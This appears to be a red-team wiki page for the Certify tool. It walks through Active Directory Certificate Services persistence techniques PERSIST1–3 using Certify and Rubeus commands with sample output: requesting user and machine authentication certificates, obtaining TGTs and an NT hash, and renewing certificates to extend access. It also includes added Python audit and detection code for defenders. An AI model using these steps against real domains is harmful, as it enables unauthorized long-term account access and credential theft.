
2 ‐ Account Persistence Techniques

Valdemar Carøe edited this page Aug 6, 2025 · 3 revisions

In June 2021, Will Schroeder and Lee Chagolla-Christensen released a paper on Active Directory Certificate Services (AD CS) called Certified Pre-Owned. The paper featured a range of account persistence techniques dubbed PERSIST1 through PERSIST3 and a range of domain persistence techniques dubbed DPERSIST1 through DPERSIST3.

This wiki page seeks to help you understand the different persistence techniques and to show how the relevant actions can be carried out using Certify.

PERSIST1 - User Persistence via Certificates

PERSIST1 is a technique used to extend initial access to a user into persistent access by requesting a client authentication certificate in the context of the user account, which can be used for future authentication as the user account. If, for example, a phishing attack is successful and access is obtained as a user for which the credentials are unknown, persistent access to that user can be obtained through certificates.

According to Certified Pre-Owned, the following criteria comprise a suitable certificate template:

  • The enterprise CA grants enrollment rights to the user account.
    • Otherwise, the account would be unable to request any certificates from the CA.
  • The certificate template grants enrollment rights to the user account.
    • Otherwise, the account would be unable to request certificates based on the specific template.
  • The "manager approval" feature is disabled for the certificate template.
    • Otherwise, a "CA Manager" would have to manually review and approve the certificate request.
  • The "authorized signature" feature is disabled for the certificate template.
    • Otherwise, an enrollment agent would need to sign the certificate request on behalf of the requester.
  • The certificate template defines an Extended Key Usage (EKU) that enables client authentication.
    • Client Authentication (1.3.6.1.5.5.7.3.2)
    • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • Any Purpose (2.5.29.37.0)
    • Subordinate CA (No EKUs)

We can search for certificate templates with these conditions using the enum-templates --filter-client-auth command from Certify. For more information about the command and its parameters, please refer to the Command Overview page.

> Certify.exe enum-templates --filter-enabled --filter-client-auth --hide-admins

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v2.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=corp,DC=local'
[*] Classifying vulnerabilities in the context of built-in low-privileged domain groups.

...

[*] Enabled certificate templates found using the current filter parameters:

    Template Name                         : User
    Enabled                               : True
    Publishing CAs                        : ca01.corp.local\CORP-CA01-CA
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    Certificate Name Flag                 : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    Enrollment Flag                       : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
+   Manager Approval Required             : False
+   Authorized Signatures Required        : 0
+   Extended Key Usage                    : Client Authentication, Encrypting File System, Secure Email
    Certificate Application Policies      : <null>
    Permissions
      Enrollment Permissions
+       Enrollment Rights           : CORP\Domain Users               S-1-5-21-976219687-1556195986-4104514715-513
      Object Control Permissions

Certify completed in 00:00:01.7777410

Once we have identified a suitable certificate template that the user account can enroll in, we can request a certificate based on the template using the request command from Certify.

> Certify.exe request --ca ca01.corp.local\CORP-CA01-CA --template User

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v2.0.0

[*] Action: Request a certificate

[*] Current user context    : CORP\lowpriv
[*] No subject name specified, using current context as subject.

[*] Template                : User
[*] Subject                 : CN=lowpriv, OU=Users, OU=Corp, DC=corp, DC=local

[*] Certificate Authority   : ca01.corp.local\CORP-CA01-CA
[*] CA Response             : The certificate has been issued.
[*] Request ID              : 1

[*] Certificate (PFX)       :

MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh...

Certify completed in 00:00:04.3614718

When the certificate has been issued, it can be used to persistently authenticate as the user account using the asktgt command from Rubeus. We can also use the /getcredentials parameter to request a U2U service ticket and retrieve the NT hash of the user account's password.

> Rubeus.exe asktgt /user:lowpriv /certificate:MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh... /getcredentials

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.2

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: E=lowpriv@corp.local, CN=lowpriv, OU=Users, OU=Corp, DC=corp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'corp.local\lowpriv'
[*] Using domain controller: 10.10.10.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGHjCCBhqgAwIBBaEDAgEWooIFMTCCBS1hggUpMIIFJaADAgEFoQ8bDU1FR0FLRUsuTE9DQUyiIjAg
      ...

  ServiceName              :  krbtgt/corp.local
  ServiceRealm             :  CORP.LOCAL
  UserName                 :  lowpriv
  UserRealm                :  CORP.LOCAL
  StartTime                :  30/06/2025 15.16.52
  EndTime                  :  01/07/2025 01.16.52
  RenewTill                :  07/07/2025 15.16.52
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  AFXzq5Bai41JhCj70jrfyA==
  ASREP (key)              :  D4F939DAB9C7B93717EB048B0F0F5F5C

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
+      NTLM              : 31D6CFE0D16AE931B73C59D7E0C089C0

The issued certificate will be able to authenticate for the duration given by the Validity Period attribute of the certificate template. In order to extend the persistence period, we need to abuse PERSIST3.

PERSIST2 - Machine Persistence via Certificates

PERSIST2 is a technique used to extend initial access to a machine into persistent access by requesting a client authentication certificate in the context of the machine account, which can be used for future authentication as the machine account. This requires administrative privileges on the system.

According to Certified Pre-Owned, the following criteria comprise a suitable certificate template:

  • The enterprise CA grants enrollment rights to the machine account.
    • Otherwise, the account would be unable to request any certificates from the CA.
  • The certificate template grants enrollment rights to the machine account.
    • Otherwise, the account would be unable to request certificates based on the specific template.
  • The "manager approval" feature is disabled for the certificate template.
    • Otherwise, a "CA Manager" would have to manually review and approve the certificate request.
  • The "authorized signature" feature is disabled for the certificate template.
    • Otherwise, an enrollment agent would need to sign the certificate request on behalf of the requester.
  • The certificate template defines an Extended Key Usage (EKU) that enables client authentication.
    • Client Authentication (1.3.6.1.5.5.7.3.2)
    • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
    • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
    • Any Purpose (2.5.29.37.0)
    • Subordinate CA (No EKUs)

We can search for certificate templates with these conditions using the enum-templates --filter-client-auth command from Certify. For more information about the command and its parameters, please refer to the Command Overview page.

> Certify.exe enum-templates --filter-enabled --filter-client-auth --hide-admins

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v2.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=corp,DC=local'
[*] Classifying vulnerabilities in the context of built-in low-privileged domain groups.

...

[*] Enabled certificate templates found using the current filter parameters:

    Template Name                         : Machine
    Enabled                               : True
    Publishing CAs                        : ca01.corp.local\CORP-CA01-CA
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    Certificate Name Flag                 : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
    Enrollment Flag                       : AUTO_ENROLLMENT
+   Manager Approval Required             : False
+   Authorized Signatures Required        : 0
+   Extended Key Usage                    : Client Authentication, Server Authentication
    Certificate Application Policies      : <null>
    Permissions
      Enrollment Permissions
+       Enrollment Rights           : CORP\Domain Computers           S-1-5-21-976219687-1556195986-4104514715-515
      Object Control Permissions

Certify completed in 00:00:01.7777410
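The five criteria above (the same list as under PERSIST1) are also what a defender audits for. The following Python is an added example, not code from the Certify project: it parses Certify-style template output (a constructed sample, not output captured from a real CA) and lists the templates that satisfy every criterion for Domain Users or Domain Computers, i.e. the templates whose enrollment permissions or approval settings should be tightened. The RID set and the control template are assumptions made for the example.

```python
import re
# Constructed sample in the layout Certify prints, trimmed to the fields the check reads;
# not output captured from a real CA. 'Restricted' is a control that must not match.
SAMPLE = r"""
    Template Name                         : User
+   Manager Approval Required             : False
+   Authorized Signatures Required        : 0
+   Extended Key Usage                    : Client Authentication, Encrypting File System, Secure Email
+       Enrollment Rights           : CORP\Domain Users               S-1-5-21-976219687-1556195986-4104514715-513

    Template Name                         : Restricted
    Manager Approval Required             : False
    Authorized Signatures Required        : 0
    Extended Key Usage                    : Client Authentication, Server Authentication
        Enrollment Rights           : CORP\PKI Admins                 S-1-5-21-976219687-1556195986-4104514715-1105
"""
CLIENT_AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
                    "Smart Card Logon", "Any Purpose"}   # a template with no EKU at all also qualifies
LOW_PRIV_RIDS = {"513", "515"}   # Domain Users, Domain Computers (the groups shown on this page)

def parse_templates(text):
    # One {field: value} dict per template; 'Enrollment Rights' is gathered into a list.
    templates, current = [], None
    for line in text.splitlines():
        m = re.match(r"\s*\+?\s*([A-Za-z ]+?)\s*:\s*(.*)$", line)
        if not m:
            continue                      # headings such as 'Permissions' carry no value
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Template Name":
            current = {"Template Name": value, "Enrollment Rights": []}
            templates.append(current)
        elif current is not None and key == "Enrollment Rights":
            current[key].append(value)
        elif current is not None:
            current[key] = value
    return templates

def persist_candidates(text):
    # Templates meeting every criterion listed above for a low-privileged enrollee.
    # A missing or '<null>' EKU list is treated as 'no EKUs' (the Subordinate CA case).
    hits = []
    for t in parse_templates(text):
        ekus = {e.strip() for e in t.get("Extended Key Usage", "").split(",")} - {"", "<null>"}
        if (t.get("Manager Approval Required") == "False"
                and t.get("Authorized Signatures Required") == "0"
                and (not ekus or ekus & CLIENT_AUTH_EKUS)
                # a rights line ends in the principal's SID; compare its RID
                and any(r.split()[-1].rsplit("-", 1)[-1] in LOW_PRIV_RIDS
                        for r in t["Enrollment Rights"])):
            hits.append(t["Template Name"])
    return hits
```

Feeding it the full output of enum-templates works the same way, since lines without a "field : value" shape are ignored.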

Once we have identified a suitable certificate template that the machine account can enroll in, we can request a certificate based on the template using the request command from Certify.

> Certify.exe request --ca ca01.corp.local\CORP-CA01-CA --template Machine --machine

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v2.0.0

[*] Action: Request a certificate
[*] Elevating to SYSTEM context for machine cert request

[*] Current user context    : NT AUTHORITY\SYSTEM
[*] No subject name specified, using current machine as subject

[*] Template                : Machine
[*] Subject                 : CN=WS01.corp.local

[*] Certificate Authority   : ca01.corp.local\CORP-CA01-CA
[*] CA Response             : The certificate has been issued.
[*] Request ID              : 1

[*] Certificate (PFX)       :

MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh...

Certify completed in 00:00:03.5329344

When the certificate has been issued, it can be used to persistently authenticate as the machine account using the asktgt command from Rubeus.

> Rubeus.exe asktgt /user:WS01$ /certificate:MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh...

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.2

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=WS01.corp.local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'corp.local\WS01$'
[*] Using domain controller: 10.10.10.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGAjCCBf6gAwIBBaEDAgEWooIFFzCCBRNhggUPMIIFC6ADAgEFoQ8bDU1FR0FLRUsuTE9DQUyiIjAg
      ...

  ServiceName              :  krbtgt/corp.local
  ServiceRealm             :  CORP.LOCAL
  UserName                 :  WS01$
  UserRealm                :  CORP.LOCAL
  StartTime                :  30/06/2025 15.32.19
  EndTime                  :  01/07/2025 01.32.19
  RenewTill                :  07/07/2025 15.32.19
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  1c0P/+z4mogj2vJl122GvA==
  ASREP (key)              :  B357DDA2405237F78276BB9DA9720749

The issued certificate will be able to authenticate for the duration given by the Validity Period attribute of the certificate template. In order to extend the persistence period, we need to abuse PERSIST3.

PERSIST3 - Account Persistence via Certificate Renewal

PERSIST3 is a technique used to extend the lifetime of persistence obtained through PERSIST1 or PERSIST2. Certificate templates have a Validity Period attribute that determines for how long an issued certificate can be used as well as a Renewal Period attribute that determines for how long an issued certificate can be renewed.

If we look at the User and Machine templates displayed in PERSIST1 or PERSIST2, we see that they have the default values for Validity Period (1 year) and Renewal Period (6 weeks). This effectively means that certificates issued from these templates can be used for 1 year, but can only be renewed in the first 6 weeks after being issued.

    Template Name                         : User
    Enabled                               : True
    Publishing CAs                        : ca01.corp.local\CORP-CA01-CA
    Schema Version                        : 1
+   Validity Period                       : 1 year
+   Renewal Period                        : 6 weeks
    Certificate Name Flag                 : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    Enrollment Flag                       : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Manager Approval Required             : False
    Authorized Signatures Required        : 0
    Extended Key Usage                    : Client Authentication, Encrypting File System, Secure Email
    Certificate Application Policies      : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : CORP\Domain Users               S-1-5-21-976219687-1556195986-4104514715-513
      Object Control Permissions
      
    Template Name                         : Machine
    Enabled                               : True
    Publishing CAs                        : ca01.corp.local\CORP-CA01-CA
    Schema Version                        : 1
+   Validity Period                       : 1 year
+   Renewal Period                        : 6 weeks
    Certificate Name Flag                 : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
    Enrollment Flag                       : AUTO_ENROLLMENT
    Manager Approval Required             : False
    Authorized Signatures Required        : 0
    Extended Key Usage                    : Client Authentication, Server Authentication
    Certificate Application Policies      : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : CORP\Domain Computers           S-1-5-21-976219687-1556195986-4104514715-515
      Object Control Permissions

If we keep renewing a certificate before its Renewal Period expires, we can extend our persistence indefinitely. This can be done using the request-renew command from Certify.

> Certify.exe request-renew --ca ca01.corp.local\corp-CA01-CA --cert-pfx MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh...

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v2.0.0

[*] Action: Request a certificate renewal

[*] Current user context    : CORP\lowpriv

[*] Certificate Authority   : ca01.corp.local\CORP-CA01-CA
[*] CA Response             : The certificate has been issued.
[*] Request ID              : 2

[*] Certificate (PFX)       :

MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh...

Certify completed in 00:00:03.8915965
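A renewal chain like the one above, and the Validity/Renewal Period interplay described under PERSIST3, leaves a trail in the CA database: every renewal is a fresh issuance (Request ID 2 following Request ID 1 here) for the same requester and template while the previous certificate is still valid. The following Python is an added example and not part of Certify; it assumes issuance records exported from the CA database with RequestID, RequesterName, CertificateTemplate, NotBefore and NotAfter fields (the records below are constructed) and flags requesters whose chained certificates cover more than one template validity period.

```python
from datetime import date, timedelta

VALIDITY = timedelta(days=365)   # 'Validity Period : 1 year' on the User and Machine templates above

# Constructed issuance records mirroring the CA database columns a defender would export;
# not data taken from a real CA. lowpriv renews twice, each time within the prior cert's validity.
RECORDS = [
    {"RequestID": 1, "RequesterName": r"CORP\lowpriv", "CertificateTemplate": "User",
     "NotBefore": date(2025, 6, 30), "NotAfter": date(2026, 6, 30)},
    {"RequestID": 2, "RequesterName": r"CORP\lowpriv", "CertificateTemplate": "User",
     "NotBefore": date(2025, 8, 4), "NotAfter": date(2026, 8, 4)},
    {"RequestID": 3, "RequesterName": r"CORP\lowpriv", "CertificateTemplate": "User",
     "NotBefore": date(2025, 9, 8), "NotAfter": date(2026, 9, 8)},
    {"RequestID": 4, "RequesterName": r"CORP\WS01$", "CertificateTemplate": "Machine",
     "NotBefore": date(2025, 6, 30), "NotAfter": date(2026, 6, 30)},
]

def renewal_chains(records):
    # Group issuances per (requester, template) in time order and link each certificate to
    # its predecessor when it was issued while the predecessor was still valid.
    by_key = {}
    for r in sorted(records, key=lambda r: r["NotBefore"]):
        by_key.setdefault((r["RequesterName"], r["CertificateTemplate"]), []).append(r)
    chains = []
    for (who, tmpl), certs in by_key.items():
        chain = [certs[0]]
        for c in certs[1:]:
            if c["NotBefore"] <= chain[-1]["NotAfter"]:
                chain.append(c)
            else:                      # gap: previous cert had expired, start a new chain
                chains.append((who, tmpl, chain))
                chain = [c]
        chains.append((who, tmpl, chain))
    return chains

def flag_extended_persistence(records, validity=VALIDITY):
    # Report chains with repeated issuances and whether their combined coverage already
    # exceeds one validity period; those are the ones to review and, if unexplained, revoke.
    out = []
    for who, tmpl, chain in renewal_chains(records):
        if len(chain) > 1:
            covered = chain[-1]["NotAfter"] - chain[0]["NotBefore"]
            out.append({"requester": who, "template": tmpl,
                        "request_ids": [c["RequestID"] for c in chain],
                        "days_covered": covered.days,
                        "beyond_one_validity": covered > validity})
    return out
```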
